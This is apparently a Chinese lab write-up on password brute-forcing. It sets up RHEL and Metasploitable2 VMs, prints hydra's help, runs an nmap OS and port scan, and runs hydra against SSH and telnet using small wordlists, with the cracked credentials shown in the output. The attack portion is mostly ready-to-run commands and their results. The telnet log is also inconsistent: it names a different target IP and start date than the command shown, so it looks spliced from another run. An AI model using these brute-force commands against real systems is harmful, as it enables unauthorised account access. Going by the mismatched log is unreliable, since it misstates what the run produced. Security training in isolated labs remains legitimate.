实验准备
软件:VMware Workstation Pro
虚拟机:kali linux 2022,Metasploitable2-Linux,Red Hat Enterprise Linux 7 服务器
网络模式:NAT模式
需要在红帽上部署sshd服务,vsftpd服务
部署实验环境
之前挂载过yum的就不需要再挂载了
[root@localhost 桌面]# mkdir /mnt/cdrom
[root@localhost 桌面]# mount /dev/sr0 /mnt/cdrom/
mount: /dev/sr0 写保护,将以只读方式挂载
[root@localhost 桌面]# vim /etc/yum.repos.d/a.repo
[root@localhost 桌面]# cat /etc/yum.repos.d/a.repo
[a]
name=a
baseurl=file:///mnt/cdrom
enable=1
gpgcheck=0
重启vsftpd服务
[root@localhost 桌面]# systemctl start vsftpd
[root@localhost 桌面]# firewall-config
环境部署完成。
身份认证攻击
九头蛇hydra
kali linux 2022
hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。
┌──(root㉿hnsw)-[~/桌面]
└─# hydra -h
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-r use a non-random shuffling method for option -x
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-K do not redo failed attempts (good for -M mass scanning)
-q do not print messages about connection errors
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh使用方法
语法:Hydra 参数 IP 服务
参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。
测试前我们需要创建两个字典文件
┌──(root㉿hnsw)-[~/桌面]
└─# cd /opt
┌──(root㉿hnsw)-[/opt]
└─# vim username.txt
┌──(root㉿hnsw)-[/opt]
└─# vim pws.txt
┌──(root㉿hnsw)-[/opt]
└─# cat username.txt
aaa
bbb
msfadmin
user
student
abc
┌──(root㉿hnsw)-[/opt]
└─# cat pws.txt
abcde
fdf
dfkdfk
redhat
dkdkk
msfadmin
使用命令开始爆破:
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.159.132 ssh -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-30 14:56:15
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking ssh://192.168.159.132:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://aaa@192.168.159.132:22
[INFO] Successful, password authentication is supported by ssh://192.168.159.132:22
[STATUS] 17.00 tries/min, 17 tries in 00:01h, 31 to do in 00:02h, 2 active
[STATUS] 16.50 tries/min, 33 tries in 00:02h, 15 to do in 00:01h, 2 active
[22][ssh] host: 192.168.159.132 login: student password: redhat
[STATUS] attack finished for 192.168.159.132 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-30 14:59:14[22][ssh] host: 192.168.159.132 login: student password: redhat
可以看到爆破出来了用户student及密码redhat,
该命令即对目标IP为192.168.159.132的主机SSH协议指定用户的用户名字典为username.txt,指定密码字典为psw.txt, 同时运行的线程数为2并显示详细过程,额外进行空密码试探,及使用指定账户和密码试探。
开启靶机Metasploitable2-Linux
主机发现
存活主机操作系统识别,确认靶机IP为192.168.159.133(因为这个是突然多出来的)
┌──(root㉿hnsw)-[/opt]
└─# nmap -O 192.168.159.131-133
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-30 15:08 CST
Nmap scan report for 192.168.159.131
Host is up (0.000021s latency).
All 1000 scanned ports on 192.168.159.131 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
Nmap scan report for 192.168.159.132
Host is up (0.00019s latency).
Not shown: 988 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
MAC Address: 00:0C:29:A8:6C:1D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.10, Linux 3.4 - 3.10
Network Distance: 1 hop
Nmap scan report for 192.168.159.133
Host is up (0.00080s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:F0:CD:B7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 28.18 seconds对靶机上的FTP服务及telnet服务进行爆破
ftp服务爆破出用户名msfadmin,user及密码msfadmin,user
使用爆破出的用户名及密码验证登录成功
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.159.133 telnet -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 11:12:20
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking telnet://192.168.13.130:23/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[23][telnet] host: 192.168.13.130 login: msfadmin password: msfadmin
[23][telnet] host: 192.168.13.130 login: user password: user
[STATUS] 38.00 tries/min, 40 tries in 00:01h, 8 to do in 00:01h, 2 active
[STATUS] attack finished for 192.168.159.133 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-30 15:33:37
[23][telnet] host: 192.168.13.130 login: msfadmin password: msfadmin
[23][telnet] host: 192.168.13.130 login: user password: user
telnet 服务爆破结果也一致。
1048
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
